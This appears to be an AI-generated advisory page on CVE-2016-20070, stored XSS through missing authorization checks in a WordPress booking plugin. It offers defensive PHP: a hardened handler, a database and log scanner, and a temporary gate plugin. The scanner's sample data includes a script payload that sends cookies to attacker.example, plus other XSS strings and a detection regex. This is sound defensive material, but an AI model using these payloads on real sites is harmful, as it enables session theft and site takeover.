CVE-2016-20070 Overview
CVE-2016-20070 affects version 1.0.23 of the WordPress Booking Calendar Contact Form plugin. The plugin contains two distinct flaws: a privilege escalation issue (missing authorization checks) that lets any authenticated user, including subscribers, modify plugin options, and stored cross-site scripting [CWE-79] in those same options. Authenticated users with subscriber-level accounts can inject JavaScript payloads through parameters such as price, name, calendar_language, and email_confirmation_to_user. The stored payload executes in an administrator's browser when the admin views the affected plugin pages.
Critical Impact
Authenticated subscribers can inject stored JavaScript that runs in administrator sessions, enabling account takeover of WordPress sites running the vulnerable plugin.
Affected Products
- WordPress Booking Calendar Contact Form plugin version 1.0.23
- WordPress installations with the plugin installed and active
- Sites permitting subscriber-level user registration
Discovery Timeline
- 2026-06-15 - CVE-2016-20070 published to NVD
- 2026-06-17 - Last updated in NVD database
Technical Details for CVE-2016-20070
Vulnerability Analysis
The plugin exposes administrative actions through admin-ajax.php and admin.php endpoints without verifying caller privileges. Any authenticated WordPress user, including subscribers, can invoke these handlers and modify plugin configuration values. The handlers also fail to sanitize input parameters before storing them in the WordPress database.
When an administrator subsequently loads the plugin settings or booking pages, the stored attacker-controlled values render in the HTML response without proper output encoding. This produces stored cross-site scripting that executes with administrator privileges.
The weakness is categorized under [CWE-79] (Improper Neutralization of Input During Web Page Generation). EPSS estimates the probability of exploitation in the wild over the next 30 days at 0.231% (about the 13.7th percentile); the score is low, but a working public exploit exists, documented in Exploit-DB #39423, so the low EPSS should not be read as "not exploitable".
Root Cause
The plugin lacks two controls. First, capability checks such as current_user_can() are missing from privileged AJAX actions, breaking WordPress role separation: any logged-in account can invoke them. Second, input parameters are written to persistent storage without sanitization (for example sanitize_text_field()) and later echoed to administrators without output escaping (for example esc_html() or esc_attr()). Output escaping is the control that stops stored XSS; sanitizing on input alone is not sufficient, because a value that slips past the sanitizer is still rendered raw.
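To make the root cause concrete, the following is an added illustration written for this page; it is not the plugin's code, which the advisory does not reproduce. The hook name bcf_save_settings, the option names and the field set are assumptions, and the nonce check is shown as standard WordPress hardening (the page does not say whether the plugin had one). The vulnerable shape comes first, then the hardened handler and the escaped output path.

```php
<?php
// Added example for this page, not code from the Booking Calendar Contact Form
// plugin. Hook name, option names and field set are assumptions.

// ---- Vulnerable shape (the pattern described under Root Cause) ----
// wp_ajax_{action} fires for EVERY logged-in user, subscribers included; only
// wp_ajax_nopriv_{action} is for anonymous callers. Being authenticated is not
// being authorised, and is_admin() is true on admin-ajax.php, so it proves nothing.
function bcf_save_settings_vulnerable() {
    // No capability check, no nonce, raw $_POST written straight to wp_options.
    update_option( 'bcf_price', $_POST['price'] );
    update_option( 'bcf_name', $_POST['name'] );
    update_option( 'bcf_calendar_language', $_POST['calendar_language'] );
    // The admin page later does: echo get_option( 'bcf_name' );  -> stored XSS.
    wp_die( 'saved' );
}
// add_action( 'wp_ajax_bcf_save_settings', 'bcf_save_settings_vulnerable' );

// ---- Hardened handler ----
add_action( 'wp_ajax_bcf_save_settings', 'bcf_save_settings_hardened' );
function bcf_save_settings_hardened() {
    // 1. Authorisation: require the capability the action actually needs.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );   // calls wp_die() after sending
    }
    // 2. CSRF: the admin page must send a nonce from wp_create_nonce( 'bcf_save_settings' ).
    check_ajax_referer( 'bcf_save_settings', '_ajax_nonce' );

    // 3. Per-field validation instead of storing whatever arrived.
    $price = isset( $_POST['price'] ) ? (float) wp_unslash( $_POST['price'] ) : 0.0;
    if ( $price < 0 || ! is_finite( $price ) ) {
        wp_send_json_error( 'invalid price', 400 );
    }
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    $lang = isset( $_POST['calendar_language'] ) ? sanitize_key( $_POST['calendar_language'] ) : 'en';

    update_option( 'bcf_price', $price );
    update_option( 'bcf_name', $name );
    update_option( 'bcf_calendar_language', $lang );
    wp_send_json_success();
}

// ---- Escaped output: the control that actually stops stored XSS ----
// Sanitising on the way in helps, but every render of a stored value must be
// escaped for its context (esc_html for text nodes, esc_attr for attributes).
function bcf_render_settings_row() {
    printf(
        '<tr><td>%s</td><td><input type="text" name="name" value="%s"></td><td>%s</td></tr>',
        esc_html( get_option( 'bcf_price', '' ) ),
        esc_attr( get_option( 'bcf_name', '' ) ),
        esc_html( get_option( 'bcf_calendar_language', '' ) )
    );
}
```

The capability check and the nonce check answer two different questions (is this user allowed to do this, and did this user intend to do this), so neither replaces the other. Escaping at render time is deliberately kept even though input is sanitized: it is the layer that would have neutralized the payloads described above regardless of how they got into wp_options.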
Attack Vector
An attacker first registers or otherwise obtains a subscriber-level account on the target WordPress site. The attacker then sends a crafted POST request to the vulnerable admin-ajax.php or admin.php endpoint, supplying a JavaScript payload in parameters such as price, name, calendar_language, or email_confirmation_to_user. The payload is stored server-side and fires when an administrator browses the plugin interface, allowing session theft or administrative actions (such as creating a new administrator account) performed with the victim's privileges. Technical exploitation details are available in the VulnCheck advisory for this CVE.
Detection Methods for CVE-2016-20070
Indicators of Compromise
- POST requests to admin-ajax.php or admin.php from subscriber accounts containing <script>, onerror=, or javascript: substrings in parameter values (note that standard access logs record the query string but not the POST body, so body-borne payloads are only visible in WAF or application-level logs)
- Plugin option records in the wp_options table containing HTML tags or script payloads
- Unexpected modifications to Booking Calendar Contact Form configuration by non-administrator users
- New administrator accounts or modified user roles following plugin interaction
Detection Strategies
- Inspect WordPress access logs for requests to plugin AJAX actions originating from low-privileged authenticated sessions; access logs do not record the caller's role, so correlate the client IP or session with the wp_users table or log the role from inside WordPress
- Search plugin-managed database rows for HTML or JavaScript content in fields such as price, name, and calendar_language
- Deploy a web application firewall ruleset that flags script-like content in parameters posted to WordPress admin endpoints
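The stand-alone PHP script below is an added example, not code from the page or the vendor, that runs two of the checks above offline: it scans rows exported from wp_options for HTML or script-like content, and it filters combined-format access-log lines for POSTs to admin-ajax.php or admin.php whose URL carries script fragments. The option names and the log lines are constructed for the illustration.

```php
<?php
// Added example, not plugin code. Option names and log lines are constructed.
// Run with: php scan.php

// Script-like fragments named in the indicators above (plus common handler names).
const BCF_XSS_PATTERN = '/<\s*script\b|javascript\s*:|\bon(error|load|focus|mouseover|click)\s*=/i';

/**
 * Return the names of option rows whose value contains HTML tags or script-like
 * content. Each row is ['option_name' => ..., 'option_value' => ...] as exported
 * from wp_options (e.g. SELECT option_name, option_value FROM wp_options WHERE option_name LIKE 'bcf_%').
 */
function bcf_find_tainted_options( array $rows ): array {
    $hits = [];
    foreach ( $rows as $row ) {
        $value = (string) $row['option_value'];
        // Serialized settings arrays are scanned as one string, so a payload nested
        // inside an array element is still caught.
        $has_tags   = $value !== strip_tags( $value );
        $has_script = preg_match( BCF_XSS_PATTERN, html_entity_decode( $value ) ) === 1;
        if ( $has_tags || $has_script ) {
            $hits[] = $row['option_name'];
        }
    }
    return $hits;
}

/**
 * Return access-log lines that POST to admin-ajax.php or admin.php with script-like
 * fragments in the request URL. POST bodies are not logged, so this only sees
 * payloads sent via the query string; the wp_options scan is the authoritative check.
 */
function bcf_find_suspicious_requests( array $log_lines ): array {
    $hits = [];
    foreach ( $log_lines as $line ) {
        if ( ! preg_match( '/"POST (\/wp-admin\/(admin-ajax|admin)\.php[^" ]*)/', $line, $m ) ) {
            continue;
        }
        if ( preg_match( BCF_XSS_PATTERN, urldecode( $m[1] ) ) === 1 ) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// ---- Constructed sample data ----
$options = [
    [ 'option_name' => 'bcf_price', 'option_value' => '25.00' ],
    [ 'option_name' => 'bcf_name',
      'option_value' => 'Room A"><script>fetch("https://attacker.example/?c="+document.cookie)</script>' ],
    [ 'option_name' => 'bcf_calendar_language',
      'option_value' => 'a:1:{s:4:"lang";s:42:"<img src=x onerror=alert(document.domain)>";}' ],
    // Entity-encoded text without a real tag: must NOT be flagged.
    [ 'option_name' => 'bcf_email_confirmation_to_user', 'option_value' => 'Thank you &lt;3 for booking' ],
];
$log = [
    '203.0.113.7 - - [15/Jun/2026:10:02:11 +0000] "POST /wp-admin/admin-ajax.php?action=bcf_save_settings&price=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 12 "https://shop.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Jun/2026:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 43 "https://shop.example/wp-admin/" "Mozilla/5.0"',
    '198.51.100.4 - - [15/Jun/2026:10:03:01 +0000] "GET /wp-admin/admin.php?page=bcf_settings HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];

print 'Tainted options: ' . implode( ', ', bcf_find_tainted_options( $options ) ) . PHP_EOL;
print 'Suspicious requests: ' . count( bcf_find_suspicious_requests( $log ) ) . PHP_EOL;
```

On the sample data the options scan flags bcf_name and bcf_calendar_language and leaves the entity-encoded email text alone, while the log filter reports only the first request. Treat option hits as candidates for review rather than for automatic deletion: some settings (email templates, for instance) legitimately contain HTML, and the page's own mitigation step is to audit them.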
Monitoring Recommendations
- Enable WordPress audit logging to capture option changes and the user role that initiated them
- Alert on subscriber accounts issuing POST requests to admin endpoints, which is uncommon in normal usage
- Monitor egress from administrator workstations (proxy or endpoint logs) for requests to unknown domains shortly after an admin views plugin pages, which is how a stored payload typically exfiltrates session cookies
How to Mitigate CVE-2016-20070
Immediate Actions Required
- Update the Booking Calendar Contact Form plugin to a version later than 1.0.23, or remove it if no fixed version is available
- Disable open user registration or restrict the subscriber role until the plugin is patched or removed
- Audit existing plugin option values and remove any entries containing HTML or JavaScript content
- Review administrator accounts for unauthorized additions or privilege changes
Patch Information
Refer to the plugin's entry in the WordPress plugin directory for the latest release. Compare the installed version (Plugins screen, or the Version header in the plugin's main PHP file) against the current release and apply the update through the WordPress plugin manager.
Workarounds
- Deactivate the Booking Calendar Contact Form plugin until an updated version is installed
- Block requests to plugin AJAX actions from non-administrator users; a web application firewall can match the action parameter but generally cannot tell the caller's role, so enforce the role check inside WordPress (for example in a must-use plugin) and use the WAF for the payload-pattern rule
- Uncheck "Anyone can register" in Settings > General (the users_can_register option, value 0) to prevent attacker account creation
- Apply a Content Security Policy that disallows inline script execution on wp-admin pages to reduce XSS impact; WordPress core and many plugins rely on inline scripts in the admin, so a policy without nonces or hashes will break the dashboard, and it should be rolled out in Content-Security-Policy-Report-Only mode first
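Access logs do not record the caller's role and a WAF in front of the site cannot see it either, so the role-aware parts of the detection and workaround advice above (alerting on subscriber POSTs to admin endpoints, blocking the plugin's AJAX actions for non-administrators) are easiest to implement inside WordPress itself. The must-use plugin below is an added example, not vendor code. The gated action names are assumptions; replace them with the ones found by grepping the installed plugin for add_action( 'wp_ajax_.

```php
<?php
/**
 * Plugin Name: BCF AJAX gate (temporary virtual patch)
 * Description: Added example, not vendor code. Drop into wp-content/mu-plugins/
 * to log non-administrator POSTs to admin-ajax.php and refuse the plugin's
 * privileged actions until the plugin is updated or removed.
 */

// Actions believed to change plugin configuration. ASSUMED names: adjust to the
// installed plugin by grepping its source for add_action( 'wp_ajax_ ... ).
const BCF_GATED_ACTIONS = [ 'bcf_save_settings', 'bcf_save_price', 'bcf_save_email' ];

// admin_init fires on admin-ajax.php before the wp_ajax_{action} handler runs,
// so priority 0 here gets control ahead of the vulnerable handler.
add_action( 'admin_init', 'bcf_gate_privileged_ajax', 0 );
function bcf_gate_privileged_ajax() {
    if ( ! ( defined( 'DOING_AJAX' ) && DOING_AJAX ) ) {
        return;
    }
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '';
    if ( '' === $action ) {
        return;
    }
    $user     = wp_get_current_user();
    $is_admin = current_user_can( 'manage_options' );
    $method   = isset( $_SERVER['REQUEST_METHOD'] ) ? $_SERVER['REQUEST_METHOD'] : '';

    // Detection: every authenticated, non-admin POST to admin-ajax.php is logged with
    // its action and role. Outside heartbeat this is rare for subscribers.
    if ( 'POST' === $method && $user->ID && ! $is_admin ) {
        error_log( sprintf(
            'bcf-gate: uid=%d roles=%s action=%s ip=%s',
            $user->ID,
            implode( ',', (array) $user->roles ),
            $action,
            isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
        ) );
    }

    // Prevention: refuse the gated actions unless the caller can manage options.
    // wp_send_json_error() ends the request, so the plugin's handler never runs.
    if ( in_array( $action, BCF_GATED_ACTIONS, true ) && ! $is_admin ) {
        wp_send_json_error( 'forbidden', 403 );
    }
}
```

With WP_DEBUG_LOG enabled the log lines land in wp-content/debug.log, which can be shipped to the SIEM and alerted on for the "subscriber POST to admin endpoint" condition listed under Monitoring Recommendations. This is a stop-gap: it does not clean payloads already stored in wp_options, so the option audit and the plugin update or removal still apply.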
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

